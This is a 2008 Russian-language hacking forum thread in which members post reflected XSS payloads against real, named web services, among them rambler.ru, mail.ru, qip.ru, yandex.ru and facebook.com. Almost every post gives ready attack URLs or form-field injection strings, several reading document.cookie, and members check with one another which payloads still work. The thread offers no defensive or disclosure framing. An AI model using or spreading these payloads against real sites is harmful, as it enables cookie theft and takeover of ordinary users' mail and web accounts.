Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

    Оффтоп наказуем

    p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету
     
    3 people like this.
  2. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    rambler.ru

    http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E
     
    qwaszx000, tnAnGel, Fuckel and 2 others like this.
  3. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

    Во всех полях вставляем "><script>alert('xss')</script>

    http://goon.ru/i/phone/rus_moscow.htm

    В поле Поиск по фамилии "><script>alert('xss')</script>

    http://catalog.aport.ru/rus/add/AddUrl.aspx

    В Адрес ресурса вставляем "><script>alert('xss')</script>
     
  4. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Ramber.ru

    http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>alert(/TreV@N/)</script>

    http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert('TreV@N')</script>&form=0&hu=1&what=0

    http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&what=0"><script>alert('TreV@N')</script>

    http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script>alert('TreV@N')</script>&hu=1&what=0
     
    2 people like this.
  5. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Решил выложить XSS найденную лично мной
    Code:
    http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
     
    1 person likes this.
  6. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    пара уязвимостей на qip:
    http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
    http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E
     
  7. .dimoN.

    .dimoN. Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    76
    Likes Received:
    56
    Reputations:
    5
    по твоему же примеру
    Code:
    http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E
     
  8. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    http://inbox.uz/
    '><script>alert(/xss/)</script>
    Уязвимые поля Логин и пароль.
     
  9. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
    http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
    http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
    http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cookie)</script>
    http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.cookie)</script>
    http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
    http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
    http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
    http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>
     
    #9 Ded MustD!e, 23 Nov 2008
    Last edited: 23 Nov 2008
    3 people like this.
  10. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

    http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

    http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

    http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer')</script>

    http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
    в поле URL Вашей страницы:
    Код:
    "><script>alert(document.cookie)</script
     
    #10 Luccifer, 25 Nov 2008
    Last edited: 25 Nov 2008
  11. Luccifer

    Luccifer Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    49
    Likes Received:
    39
    Reputations:
    -4
    Mail.сру
    http://content.mail.ru/search?q=%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E

    http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1=phrase=&proto=1&url=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&title=&descr=&owner=&cperson=&email=&phone=&fax=&address=&keywords=&session_id=16073130&category_id=10993&category_name=%CC%E5%E4%E8%F6%E8%ED%E0+%E8+%E7%E4%EE%F0%EE%E2%FC%E5&page=1&save=1

    http://hosting.mail.ru/lc.jsp?loginput=&login=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscript%3E&password=


    http://infobox.ru/index.php?=action=go&domain=%22%3E%3Cscript%3Ealert('Luccifer')%3C%2Fscript%3E&tld=ru&x=21&y=4


    http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
    В поле сайтайта URL вводим:
    "><script>alert('Luccifer')</script>


    http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470


    http://hosting.mail.ru/
    в поле логин вводим
    Код:
    "><script>alert('xss')</script>
     
    #11 Luccifer, 25 Nov 2008
    Last edited: 25 Nov 2008
    1 person likes this.
  12. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    http://ds.rambler.ru/index.php?p=news&pubId=000000000000000000000000000000000000000000000003&pubMode=%3Cscript%3Ealert()%3C/script%3E
    Была активная XSS, но топик для пассивных.
     
  13. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Ну опять хсс убитого рамблера на котором даже те что есть не фиксят.
    http://ftpsearch.rambler.ru/db/ftpsearch/search.html?btnG=%CD%E0%E9%F2%E8%21&words=(XSS)=5&form=0&hu=1&what=0

    </title><script>alert('S0ulVortex')</script>
     
    #13 S0ulVortex, 19 Dec 2008
    Last edited: 19 Dec 2008
    1 person likes this.
  14. Jazz

    Jazz Elder - Старейшина

    Joined:
    27 Sep 2008
    Messages:
    80
    Likes Received:
    2
    Reputations:
    -1
    http://list.mail.ru/fast-bin/pregistration.bat?session_id=16073130&page=1
    В поле сайтайта URL вводим:
    "><script>alert('Luccifer')</script>


    http://torg.mail.ru/used/res/?p3[vendor_name]=Intel&use_model_name=1&p3%22%3E%3Cscript%3Ealert('Luccifer')%3C/script%3E=470

    уже не работают?или я не то делаю?
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    не работают.
    Code:
    http://list.mail.ru/cgi-bin/olympic_calendar.cgi?sport=%3C/textarea%3E%27%22%3E%3Cscript%3Ealert('xss%20by%20f02')%3C/script%3E
    эта работает.
     
    _________________________
    #15 yarbabin, 26 Dec 2008
    Last edited: 26 Dec 2008
  16. The matrix

    The matrix Elder - Старейшина

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    Хз. Может кто и находил. Просто рамблер совсем не фиксит XSS. Иметь там почтовый ящик не знающим просто опасно
     
    1 person likes this.
  17. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Gala.net
    Code:
    http://forum.gala.net/?ff=1012&page=search&q=%22%2F%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=and
     
    1 person likes this.
  18. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    ВШтате
    Code:
    http://vshtate.ru/reg?op=message&email=[COLOR=Yellow][B][XSS][/COLOR][/B]
    Но если авторизован, то не пашет :(
    Короче, бесполезная :(
    В профиле при добавлении инфы во многие поля срабатывает код, но сохраняется в отфильтрованом виде.
    Непохек :(
     
    3 people like this.
  19. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    Facebook.com




    Code:
    http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript
    %3Ealert(document.cookie)%3C/script%3E

    только толку от нее нету:(
     
    1 person likes this.
  20. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    http://yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert("XSS%20from%20lmns")</script>